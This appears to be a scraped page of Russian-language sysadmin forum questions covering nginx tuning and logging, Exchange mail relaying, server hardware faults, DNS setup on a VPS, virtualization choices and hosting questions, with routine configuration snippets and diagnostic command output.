Такой вот странный глюк. НКто-нибудь сталкивался с чем-либо похожим?

SYMBiO

здравствуйте! мне нужна программа на линукс которая показывает в реальном времени, кто и что пишет с/на жесткий диск,( + читает) (можно и без пути), как в шындовсе восьмерке в таск менеджере. желательно консольную.
может есть какой софт. спасибо.

MonkAlbino

Доброе время суток.

Есть 2 сервера:
— который смотрит только в локальную сеть (будем называть его IntServ);
— который смотрит одной ногой в интернет (будем называть его ExtServ), другой в локальную сеть и видит IntServ;

На IntServ настроен Exchange Server 2007 и используется он как внутрикорпоративная почта с адресами вида @%prefix%.example.local, где %prefix% — это некий региональный префикс, который меняется в разных регионах и подразделениях. На ExtServ также стоит Exchange Server 2007 и к нему прикручен домен %prefix%.example.com, где %prefix% означает тоже самое, что и у IntServ.

Возможно ли настроить так ExtServ, чтобы они занимался пересылкой почты через себя от IntServ на любую почту в интернете? Поясню на примерах:
— login1@a.example.local посылает письмо login2@b.example.local. Письмо идёт на IntServ и там дальше по внутренней локальной сети к login2.
— login1@a.example.local посылает письмо на login@example.net. Письмо идёт на IntServ, он «понимает», что письмо во вне, отсылает его ExtServ, тот подменяет адрес на login1@a.example.com и посылает какому-то серверу, обслуживающий домен example.net.
— Обратная ситуация: login@example.net посылает письмо login2@b.example.com. От сервера, обслуживающего example.net письмо приходит на ExtServ, он подменяет адрес на login2@b.example.local, отсылает письмо на IntServ, тот уже передаёт login2.

Чисто логически я тут проблемы не вижу, нужно лишь правила обработки почты на IntServ и ExtServ написать, но можно ли такое сделать на Exchange Server 2007?

P.S. IntServ нельзя просто дать доступ к интернету — служба безопасности порвёт всех и вся.

Заранее огромное спасибо!

loomaleht

Добрый день


Есть локальная сеть с 20 компами. Если комп, выделенный начальством «под сервер». На компах стоит Windows XP-7, на «сервер» можно ставить что угодно. На всех компах юзеры авторизуются под «Гостем».


Нужно найти ПО, которое позволяло бы юзерам на локальном компе, уже после авторизации в «Гостя» получить доступ к определенным сетевым дискам с определенными правами, которые определялись бы при авторизации пользователя в отдельном ПО. То есть на клиентских компах должна быть запущена программка, куда юзер введет логин-пароль и в папке «Компьютер» появится набор сетевых дисков. После Log Off сетевые диски должны быть отключены.


Пробовали Samba — не то. Сетевые диски не создает, просто показывает папку в разделе Сеть. Кроме того, мы не хотим эти диски указывать вручную, все должно быть автоматически.

rasstroen

Centos на hyper-v, свежий, только что обновленный до 6.3.
Хочу поднять nginx, php 5.3, php-fpm
Посоветуйте репозиторий, или пару, откуда правильнее всего это делать? Всегда использовал remi для php, задумался о правильности

leanid

Хочу сделать так: в здании > 20 системников, пустить их всех в интернет через шлюз на котором стоит убунту сервер, все станции получают динамический ip, у меня есть мак-адреса всех станций и я по ним хочу иметь статистику кто и сколько кушает интернет. Машины везде разные (win7, XP, mac, ubuntu) хочется не проводя никакой настройки на этих машинах знать кто-сколько кушает интернета, и что бы людей не отвлекать никакими логинами и паролями. Подскажите можно ли такое сделать? Может что-то почитать полезное, что?

AlexWinner

Добрый день.

Столкнулся со следующей ситуацией.

Есть сервер с Debian Squeeze, на нём установлен nginx 0.7.67 (из репозитория).

В принципе, всё работает без проблем, но заметили, что иногда не получается приконнектиться к порту. SYN приходит, ответа нет.

Пробовал включить syncookies, это несколько помогло (в логах вылезли ошибки про «possible SYN flooding on port 80. Sending cookies.»). Но всё равно были проблемы с коннектом. Синфлуда при этом нет, это просто много легального трафика.

После этого, увеличил следующие параметры:
net.core.somaxconn = 128000 net.core.netdev_max_backlog = 10000 net.ipv4.tcp_max_syn_backlog = 128000'

У нжинкса увеличил listen backlog до 65536.


Сообщения про «possible SYN flooding» исчезли, однако всё равно периодически не приконнектится к серверу. Проверял простеньким скриптом, который поднимает 20 тредов и открывает и закрывает сокеты к 80-му порту в каждом треде.

Из 1000 попыток открыть сокет около 30-50 отваливаются по таймауту (2 секунды), остальные при этом коннектятся практически мгновенно.


При всём этом в dmesg пусто, в error.log нжинкса тоже пусто.


Кусок конфига нжинкса:
user www-data; worker_processes 2; worker_rlimit_nofile 65535; error_log /var/log/nginx/error.log; pid /var/run/nginx.pid; events { worker_connections 65535; use epoll; } server { listen 80 default backlog=65536; ..... }


На сервере 2 ядра, LoadAverage держится меньше единицы.


В netstat'e примерно такая картина:
# netstat -ant | grep tcp | tr -s ' ' ' ' | awk '{print $6}' | sort | uniq -c 22 CLOSING 3729 ESTABLISHED 815 FIN_WAIT1 3807 FIN_WAIT2 138 LAST_ACK 5 LISTEN 167 SYN_RECV 37 SYN_SENT 1104 TIME_WAIT


В stub_status'e нжинкса:
Active connections: 5985 server accepts handled requests 35200 35200 34437 Reading: 341 Writing: 223 Waiting: 5421

На всякий случай — SYNы до сервера точно доходят, снимал tcpdump, в нём они видны.


Подскажите, пожалуйста, что смотреть, куда копать, кто сталкивался?

KorP

Господа, подскажите пожалуйста, а как лицензируется офис на терминальном сервере? Достаточно одной лицензии или их кол-во должно быть равно кол-ву клиентов? Можно ли использовать коробочные версии или нужна корпоративная (в какой поставке)? Подскажите пожалуйста, а то с виндой всё ясно, а про офис я не в курсе.

hiwent

Здравствуйте!
Столкнулся с интересной ситуацией:
Материнская плата поддерживает частоту памяти 1600 MHz, а процессор, по спецификациям: 800/1066
Вопрос: сможет ли процессор, с такой спецификацией, работать с более шустрой памятью?

Конкретизирую:
MB: ark.intel.com/products/61040/Intel-Server-Board-S2400GP2
CPU: ark.intel.com/ru/products/64614/ProductCollection.aspx?brand=41492

Diam0n

Существует ли возможность сбрасывать/обновлять содержание кеша частично?

Т.е. в кеше хранится массив данных и нужно обновить только одну страницу, не сбрасывая весь кеш.

g0dlike

Добрый день!
Есть парк серверов — 2 нагруженных веб-сервера (2 популярных веб-проекта), 2 сервера менее нагруженных, 5 серверов СХД, 3 сервера выполняющих расчеты.
Планируется взять администратора на обслуживание этого добра(обновление ПО, решение проблем, установка новых серверов изредка, выполнение различных мелких задач). Всего — до 16 часов работы в месяц
Вопрос — сколько стоит за это предлагать — так чтоб и админ был доволен и свой кошелек не пострадал:)?
Спасибо!

danielnewman

Есть проксирующий nginx перед виртуалками, хочу разрезать логи по доменам в одноименные $host-access.log файлы nginx'ом изначально, но что-то не выходит каменный цветок.

http { upstream first-upstream { server 12.34.56.1:80; } #access_log /var/log/nginx/$host-access.log; server { listen 80 default_server; location / { proxy_pass http://first-upstream; #access_log /var/log/nginx/$host-access.log; }


Не работает в любом месте включения строки access_log. В error.log сваливается:...testing "/etc/nginx//html" existence failed (2: No such file or directory) while logging request...

У Сысоева этот вопрос каким-то странным образом решали, но у меня не root, а пучек upstream'ов разноайпишных.

tyzhnenko

Насколько будет полезная статья о настройке Postfix'a в multiple instances режиме?


Это когда можно сделать так чтобы на одной машине запустилось несколько Postfix'ов с индивидуальными настройками.


Собственно в статье будет о том, как настроить Postfix с индивидуальными очередями для нескольких IP. Все что пришло на int-IP -> уйдет через предопределенный ext-IP. Ну и любые другие индивидуальные настройки для каждой копии.

redbutcold

давайте составим чеклист для проверки сервера. с чего нужно начинать, какой набор программ / скриптов использовать. все сервисы уже установлены, и так скажем крутятся несколько сайтов даже. может есть уже где примеры. по типу — проверка ab, mysqltuner, mysqlreport, php -m, apache -M, sysctl.conf, etc.

danielnewman

Имеем обычный HDD iotop -o -a за ½ часа

USER DISK WRITE IO COMMAND root 54,52 M 0,00% sw-collectd -C /etc/sw-collectd/collectd.conf root 77,27 M 0,71% [flush-253:0] root 49,90 M 1,74% [jbd2/dm-0-8] apache 19,04 M 0,01% httpd apache 18,16 M 0,04% httpd apache 14,61 M 0,02% httpd apache 12,80 M 0,01% httpd apache 12,63 M 0,03% httpd apache 12,11 M 0,02% httpd apache 10,42 M 0,02% httpd apache 5,02 M 0,01% httpd apache 4,83 M 0,01% httpd nginx 4,72 M 0,01% nginx worker mysql 2,37 M 0,02% mysqld mysql 2,03 M 0,00% mysqld mysql 88,00 K 0,00% mysqld


Итоги:

* sw-collectd — наследие Plesk'а. Какой-то прожорливый по записи (но не по IO) мониторинг.

* flush-253:0 + jbd2/dm-0-8 — дисковое журналирование (?).

* httpd/nginx — а это и есть основной источник дисковой записи — ЛОГИ!


Вроде бы не велика беда. Ну проходит за месяц ± 500Gb по дисковой системе, ну отъедаете это 0.2% IO, однако хочется понимать, на что уже сегодня следует обратить внимание, что бы меньше было вопросов завтра.


Есть какой-нибудь администраторский Дзен на дисковую тему?

Логи последнего часа вынести на безжурнальную систему?

Упростить логи и отловить ошибки кода, что бы не крошило в лог?

WarP

Имеется сервер на Windows 2008 R2 + RAS

В Ras поднято удаленное подключение к провайдеру + ЛАН

Если в ICS (интернет коннекшн шеринг) — можно делать так, чтобы удаленные устройства могли пробрасывать себе порты снаружи внутрь через UPNP — то в РРАС нет такой опции для управления подключением.

Быстрое гугление показало что нельзя =(
Т.е. гибкость в настройке роутинга и прочего — это RRAS, а делить тырнеты на сеть — это ICS, но в нем настроек — кот наплакал…

Соответственно различные сервисы при установленном RRAS, которые слушают интернеты динамически снаружи не работают.
Можно ли как-то включить эту опцию?

Sky4eg

Добрый день. Планируется установка сервера для собственных нужд, сейчас стоит вопрос о выборе панели управления «хостингом» для себя. Панель нужна для автоматизации рутины. Вчера случайно наткнулся на www.zpanelcp.com/ погонял на виртуалке в купе с CentOS6, работает очень не плохо, интерфейс приятный, юзабилити не загоняет в ступор, количество модулей и набор функциональности на уровне. Читал о последних уязвимостях, все фиксится относительно шустро. Порадоволо то, что не поганит конфиги, создает довольно чистые файлы конфигурации. Не требует специфического ПО, все берет из стандартных репозиториев.


Хотелось бы услышать мнение тех, кто сталкивался с данной панелью

hiwent

Здравствуйте!


Столкнулся с проблемой.

Собрали сервер новый.

При установке любой ОС он либо выключается, либо, в случае с Windows 2012, после копирования файлов, появляется BSOD (код ошибки не успеваю увидеть, в ребут уходит), и сервер уходит в ребут.

При установке Ubuntu Server, после выбора языка сервер просто выключается. Выключается и при установке Win Server 2008 R2, после копирования фалов, опять же.


При включении сервера динамик пищит коротко 6 раз: Ошибка инициализации контроллера клавиатуры, подсказывает вики.

Когда отключал клаву слышал как пищал и 4 раза и 5. (Неисправность системного таймера и Проблемы с процессором, соответственно).


При этом, в bios всё определяется отлично!!! Всё узлы видны, все характеристики соответствуют спецификациям. Настройки сделаны вроде правильно.


Конфигурация сервера

MB: Intel® Server Board S2400GP2

CPU: Intel® Xeon® Processor E5-2407

(10M Cache, 2.20 GHz, 6.40 GT/s Intel® QPI)

Оператива: Kingston KVR16R11D4/16 16Gb

Жёсткий диск: 1ТБ, 3.5", 7200об/мин, 64МБ, SATA III, Seagate Barracuda 7200.14, ST1000DM003


Что пробовал сделать для решения проблемы.

1) Сбрасывать настройки биоса, реконфигурировать

2) Пробовал стартовать без HDD

3) Пробовал менять слот оперативы, но если первый слот пуст, то пищит три раза, долго, не видит память. Так что полноценно попробовать не удалось

4) Пробовал разные дистрибутивы, лайв образы

5) Пробовал включаться без клавы и мыши


Подскажите, с чем наиболее вероятно проблема, и если дело в настройках, подскажите, на что обратить внимание!

Спасибо!

gigigi

Здравствуйте.

Долгое время мы с коллегой были единственнами разработчиками, у нас есть свой локальный сервер с nginx + php-fpm + mysql + git.

На локальном сервере есть все наши проекты, и когда к нам пришёл ещё один разработчик — встала задача дать ему возможность использовать всё тоже самое, но в изолированной среде, т.к. сотрудник пока на испытательном сроке и 100% уверенности в нём нет.


На сервере стоит Ubuntu server, опыт администрирования есть, но вот опыта с изолированием пользователей нет.

Я так понимаю, с chroot много возни, и самый простой вариант будет поднять виртуалку.

Отсюда вопрос — какую виртуальную машину выбрать для этих целей? Какие подводные камни?

Заранее спасибо!

danielnewman

Многоуважаемые, как решить задачи логирования и красивой организации конфигов nginx, когда адреса и с префиксом www/ftp/mysql… и без него хочется логировать в один файл в одной папке под заданный набор хостов?

upstream vserver_pool { server 100.100.100.100:80; } root /var/log/nginx/; access_log /var/log/nginx/$host-access.log; error_log /var/log/nginx/error.log; server { listen 80; server_name www.domain1.tld; return 301 http://domain1.tld$request_uri; root /var/log/nginx/$host/; access_log /var/log/nginx/$host/$host-access.log; } .......................................... server { listen 80; server_name www.domain100500.tld; return 301 http://domain100500.tld$request_uri; root /var/log/nginx/$host/; access_log /var/log/nginx/$host/$host-access.log; }

Проблема красивой организации конфигов всплывают, когда есть потребность к каждому хосту прибавить набор идентичных правил проксирования. 10 раз добавить идентичный кусок:
server { listen 80 default_server; location ~ /\.ht { deny all; } location = /favicon.ico { log_not_found off; access_log off; } location = /robots.txt { allow all; log_not_found off; access_log off; } location / { proxy_pass http://vserver_pool; proxy_next_upstream error timeout invalid_header http_500 http_502 http_503 http_504; proxy_redirect off; proxy_buffering off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } }

И 5 раз — не идентичный. Возникает проблема с иерархией. Я полагал, что частный случай конфига будет иметь приоритет, однако все, чего я добиваюсь — дублирование логов, в случае наличия префикса www в имени хоста.

powerman

Только что обнаружил, что доступ к zhurnal.lib.ru/ заблокирован «Ростелеком» со ссылкой на zapret-info.gov.ru. (Разумеется, ни по имени домена ни по IP zapret-info.gov.ru не выдаёт этот сайт как заблокированный.)

А вопрос у меня такой: я, вообще-то, нахожусь на Украине. Законы принятые в России как-бэ не должны ограничивать граждан других стран, не? Особенно тех, которые даже не находятся на территории России? Если бы закон требовал закрытия сайта/отключения серверов (расположенных на территории страны) — одно дело. Но он требует блокирования доступа к некоторым сайтам и может касаться только граждан своей страны. Ну, это по логике и в идеальном мире, разумеется. В общем, может Ростелекому стоит поумерить энтузиазм вылизывания жоп чиновникам и перестать блокировать доступ к сайтам, не заблокированным по данным zapret-info.gov.ru, хотя бы для не-российских IP?

ZoRgSoft

Завалялся у меня дома старенький компьютер:
AMD Duron 800 MHz, 192mb RAM, 40gb HDD Seagate, видео встроенное, мать ASUS модель не помню.

Хотелось бы услышать советы какой поставить дистрибутив Linux что бы быстро работал и безопасность была на высоте.
Веб сервер с БД (mysql и pg) будеть смотреть в интернет, хостить максимум 10 моих сайтов с небольшое посещаемостью.

Или FreeBSD будет быстрее и менее требовательна к железу?

Настроить конечно могу и сам всё с нуля, может просто есть какие небольшие дистрибутивы подобного рода?

И как по требованиям Ubuntu Server 12.04lts? Что то у них минимальные требования я не нашел к железу.

P.S. И потянет ли такая машина ещё если поставить систему контроля версий (cvs, mercurilal...) что бы через интернет удалённо мог исходники свои и ещё пара человек могли синхронизировать?

skorney

В моем распоряжении VPS от Hetzner-a. Есть один домен с поддоменами, нужно добавить еще один домен.

1) Я так понимаю что нужно добавить еще одну DNS запись? (стоит у них 0.59 евро в месяц).
2) У меня на imena.ua в настройках уже есть одни ns сервера, то есть мне уже hetzner-a сервера по дефолту не нужны? (хотя первый домен работает на hetzner-овских). Если есть ns от imena то какие лучше использовать, их или от hetzner.
3) У меня первый домен настроен на директорию www (в настройке DNS записи), можно же второй домен настроить на поддиректорию www/somedir?

lmaxximl

Суть такая. Есть серверная стойка, в ней сервер esxi и система хранения VNX3100, есть домен на WIndows Server 2008.


Вопрос в следующем:

1. Использовать на СХД шару, тем самым зарегистрировать СХД в Домене.

2. Использовать виртуальный сервер Windows\*nix для файлового сервера с хранением виртуалки на СХД.


Сомнения:

1. СХД в домене как шара нормально ли?

2. Виртуальный сервер на esxi с хранением образа на СХД и использования его как файловый сервер. Стабильно/безопасно ли?

Rchee

Есть задачка сделать так, чтобы site.ru/cat вел на cat.site.ru.
В ISP Manager есть функция «автоподдомены как www директория», но похоже она толком не работает, т.к. при ее включении ничего не меняется.
Подскажите как реализуется такая схема?

silvi

За пару лет уже четыре раза становилась система readonly (VPS Debian 2Gb). Причем, если раньше был перерыв в полгода, то в последний раз прошло всего две недели между сбоем сервера. Потихоньку растет посещаемость, но тенденция настораживает.


Для восстановления работоспособности делал.


umount -a

fsck -C0 /dev/sda

fsck -C0 /dev/sda1

fsck -C0 /dev/sda2

fsck -C0 /dev/sda3

mount -a


В чем может быть проблема и что посоветуете делать?

lmaxximl

Народ помогите настроить СХД VNXe 3100 как файловую шару в домене Windows Server 2008.


При стандартной настройке

Настройки — Настройка файлового сервера — добавить файловый сервер — Имя — ip моей сети — маска — шлюз? пишу любой у меня их 3 — Файловые ресурсы Windows — Присоединиться к домену — имя домена — ip КД — Логин и пароль администратора домена — При применении настроек получаю следующую ошибку «В домене Active Directory не удалось найти контроллер домена.

(Код ошибки:0x60008c5)»

XHunter

Достался один мощный юнитовый сервер, и решили использовать его для рендеринга. Сам с таким дела не имел, понаходил только решения на базе нескольких серверов.
Кто с подобным сталкивался? В какую сторону копать или может мануалы есть готовые по построению. Или с одним ничего толкового не выйдет?

paco

Взял dedicated server на Windows Server 2008 R2 Web Edition (у OVH.COM).


На сервере будет крутиться IIS + SQL Server Express 2012.

Будет всего 1 сайт, которым будут пользоваться только сотрудники компании.


Когда сайт работал внутри интранет-сети все настройки были по-умолчанию и меня это устраивало. Но так как теперь сервер и сайт будут доступны в интернете появились повышенные требования к безопасности.


Подскажите или дайте ссылки на руководство по настройке безопасности iis и sqlexpress для боевых условий.

Нужна максимальная безопасность.


Доступ к сайту будет только по https-протоколу (создал бесплатный SSL-сертификат от startssl).

xSkyFoXx

Подскажите, пожалуйста, существуют ли системы (за ссылки отдельная благодаронсть!), которые позволят обновлять ряд сайтов в едином интерфейсе? Сужу задачу: php only, только популярные, opensource CMS.
Предположим, что у меня есть 3 чайта на WP, 3 на Joomla! и 1 на Drupal. Для них регулярно выходят обновления безопасности. Можно ли не идя в админку каждого по отдельности воспользоваться какой-то системой (сервисом) и провести их обновления из единого интерфейса?

chuck

Доброго времени суток.


Пожалуйста, подскажите, как посчитать тарифы на хостинг?

Что нужно учитывать при формировании тарифов?

King_Of_Magic

Я нахожусь в городе K, в городе O остался мой PC с Windows 7 Home Premium, вчера моя мама, с помощью моих инструкций, собрала этот комп (был разобран) и установила туда Team Viewer (+1 за крутую маму), в результате чего у меня теперь к нему есть удалённый доступ, учётка админская. Но вот в чем проблема: мне хотелось бы иметь возможность удалённо включать его, чтобы он не тарабанил сутками. Подскажите, пожалуйста, наиболее оптимальные пути решения.

Elfet

Интересует вопрос о распространённости PHP 5.4. Стоит ли начинать делать новый коробочный продукт на нём? Или всё же придётся на PHP 5.3?

ENargit

Здравствуйте, Хабрапользователи!

Я задумал настроить себе домашний сервер, который хостил бы мои скромные проекты и при этом служил бы интерфейсом домашнего кинотеатра и основой системы домашней автоматизации. По описаниям, в качестве интерфейса мне понравился вариант Linux MCE, но стабильный релиз очень древний (KUbuntu 8.10), даже нестабильный устарел еще до выхода (KUbuntu 10.04). И вообще — эта система не подходит, чтобы хостить на ней проекты и использовать как сервер.

Тогда появилась мысль о виртуализации — поставить серверный дистрибутив (Debian или Gentoo, еще не определился), а интерфейс организовать периодически включаемой виртуалкой. Но из особенностей — необходимость отдать виртуалке видеокарту (NVidia), возможность читать с реального жесткого диска и доступ к локальной сети.

Можете ли вы посоветовать, какую виртуализацию лучше использовать? Сходу пришел к выбору между Xen и KVM (хотя может, есть более подходящие варианты), но не могу сделать осознанный выбор.

McDoe254

Много дистрибутивов красивых и разных. Нужно юзерфрендли решение, которое быстро разворачивается без подключения к интернету и сходу предоставляет в пользование что-то вроде локального веб-сервера (а-ля Денвер) с PHP и MySQL+phpMyAdmin.

Coolfly

Господа, посоветуйте пожалуйста FTP хостинг для IP камеры наблюдения, желательно зарубежный и, неплохо бы бесплатный, но я понимаю что нормальный сервис бесплатным не бывает, но для начала хотя бы так. Требуется писать с IP камеры по FTP, изображение на удаленный хостинг. Заранее спасибо.

Mock

В случае, если 2 компьютера за NAT'ом, как идет соединение между машинами?

Я так понимаю это будет Комп 1 -> Сервер ТВ -> Комп 2

И тут сразу вопрос, чтобы убрать промежуточный сервер ТВ и как следствие дополнительный пинг, может достаточно на принимающем компе (Комп 2) получить реальный ip адрес и они будут коннектиться напрямую? Или траффик все равно идет через сервер ТВ?

Сразу надо добавить и другой вариант, при схеме когда 2 компьютера за NAT'ом, может быть что Комп 1 -> Сервер ТВ -> Комп 2, но отклик к серверу идет единичный, а дальше компьютеры соединяются напрямую. Или я не прав?

Буду признателен, если кто подробно разъяснит

Meliborn

Здравствуйте. Купил себе домен. Затем взял VDS у iphoster. Но тут такая проблема, что весь мой опыт привязки домена к хостингу сводился к вписыванию этого домена в пользовательском аккаунте (например как в timeweb). Здесь же такой «халявы» нет. Голый vds и делай что хочешь. Они мне выдали dns сервера (для каждого vds свои) и я их вбил в настройках регистратора домена.


Чтобы хоть как то упростить задачу, накатил webmin и полез разбираться с BIND сервером (насколько я понял это то что мне нужно). Вроде бы теперь домен ведет на 80 порт vds (nginx + unicorn). И то я так и не понял как я это сделал — пробовал создавать master, slave, forward.

Но мне надо использовать поддомены. Конфиги для них успешно созданы и ждут своего момента. Что необходимо сделать со стороны BIND(master, slave, forward?). Просто добавление основного домена и создание виртуальных хостов не прокатывает. Да и я помню что в том же timeweb я создавал поддомены для каждого домена. Очень хотелось бы разобраться раз и навсегда.

DjPhoeniX

Суть в двух словах:

Есть псевдо-TLD для внутреннего использования внутри локальной сети. Bind, nginx, etc — настроены и работают, все домены в зоне .dev направляются на сервер и правильно работают.

Необходимо, используя OpenSSL, создать SSL-сертификат разом для всех сайтов, без необходимости заменять его при создании нового виртуального домена.

Пока что имею следующую картину: клик.

PlatinumArcade

Подскажите, как составить скрипт для накопительного бакапа сервера на удаленный VPS? Везде CentOS.

Т.е. чтоб ежедневно копировались только новые и измененные файлы. Никак не могу ничего подобного нагуглить…

Moskus

Есть задача: размещать картографические материалы (растровые карты) в тайловых форматах (много-много маленьких картинок 256х256 пикселей, на пространство в единицы квадратных километров таких тайлов легко может быть тысяча) на хостинге в Европе или США.

Общий объем — десятки и сотни Гб.

Добавляться данные будут порциями около 1 Гб.

Использоваться — аналогично тому, как запрашиваются данные у картографических веб-сервисов (Google maps, Яндекс.Карты) — много get-ов этих самых тайлов одновременно. Сколько именно — пока сложно сказать, но хорошо бы, чтобы ограничения в этом смысле были максимально мягкими.


Тайлы должны быть доступны по некоторому постоянному заранее определенному пути с заранее определенными именами через HTTP (они организованы в папки с цифровыми именами по масштабам и координатам). Соответственно, ситуация, когда контент кочует по storage farm-ам и прежде чем его получить, сервер должен еще пообщаться с хостингом и запросить актуальный URL объекта — исключена.


Почитал про Amazon S3 — в смысле условий хранения и цен — нравится, но как-то не понял, нет ли там проблемы с постоянным URL объекта.


Если этот сервис не подходит под мои требования — подскажите, если возможно, какой подходит (если речь не идет об очевидных статических хостингах).

nemoforum

Уже довольно продолжительное время назревает вопрос замены текущего решения на базе Asus RT-N16 с прошивкой Tomato на что-то «нормальное» по многим причинам, но самая основная — неполноценный линукс.
Последней каплей стала невозможность использования кодеков G729 и iLBC для Asterisk, т.к. для их реализации нужен FPU и никто их не собирал под MIPSEL, у которого FPU нету.

Чем занимается мой сервер:
— маршрутизатор домашней сети (раздача интернета всем и вся)
— http, ftp и samba сервер
— IP-PBX
— в перспективе медиасервер (возможность проиграть 1080p по HDMI, но не критично)

Что должно быть обязательно:
— легкость настройки сети через GUI (по этому параметру Tomato меня устраивает целиком и полность)
— никакой экзотики — основной софт должен собираться под сию платформу без танцев с бубном

Чего бы хотелось:
— тихое небольшое решение на ARM

Чего бы не хотелось:
— городить сервер на декстопных комплектующих, пусть даже в формфакторе micro-ATX (ну ладно, micro-ATX пусть будет)

Собственно поглядываю на RP, но как у нее с моими требованиями?
Какие железяки посоветуете?

digitaldemiurge

Всем привет!

Есть следующая проблема: какие-то товарищи повесили на наш ip адрес свои домены и соответственно заходя к ним на сайт показывается наш сайт.

Как можно настроить nginx, чтобы не прописанные в конфигах домены не обрабатывались им?